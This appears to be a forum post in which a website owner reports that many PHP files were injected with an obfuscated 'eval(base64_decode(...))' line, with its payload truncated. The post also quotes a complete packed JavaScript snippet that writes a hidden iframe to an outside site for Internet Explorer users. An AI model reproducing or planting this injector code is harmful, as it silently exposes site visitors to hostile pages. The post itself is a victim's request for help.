I don't know if I am to only in WWW having at least once a year hackers' visits to my webspace.
Now hundreds of files are "saturated" by
Code: Select all
eval(base64_decode("DQplcnJvcl9.........Cn0KfQ0KfQ0KfQ=="));
The code is added just after the very first
<?php in fast all (core and plugins):
language ??.php
??config.php
default.php
config.php
pagedata.php
Also one javascript.js was infected with the code "eval"
Code: Select all
(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 0=a c(),4=a c(0.i()+j);3(h.l.7("m 6")!=-1&&2.b.7("8=s")==-1){3(0.g()!=-1){5 9="d"}2.f("<e"+9+" k"+"r=1 z"+"o=1 A=\'B"+"p://x"+".y/q/\' t=\'u:n"+"w\'></3"+"v>");2.b="8=s;"+" 4="+4.C()+"; "}',39,39,'today||document|if|expires|var||indexOf|_fhjtju|iframe|new|cookie|Date|ame|ifr|write|getTimezoneOffset|navigator|getTime|2678400000|wi|appVersion|MSIE||ht||b2b|dth||style|display|rame|one|secatm|net|heig|src|htt|toGMTString'.split('|')));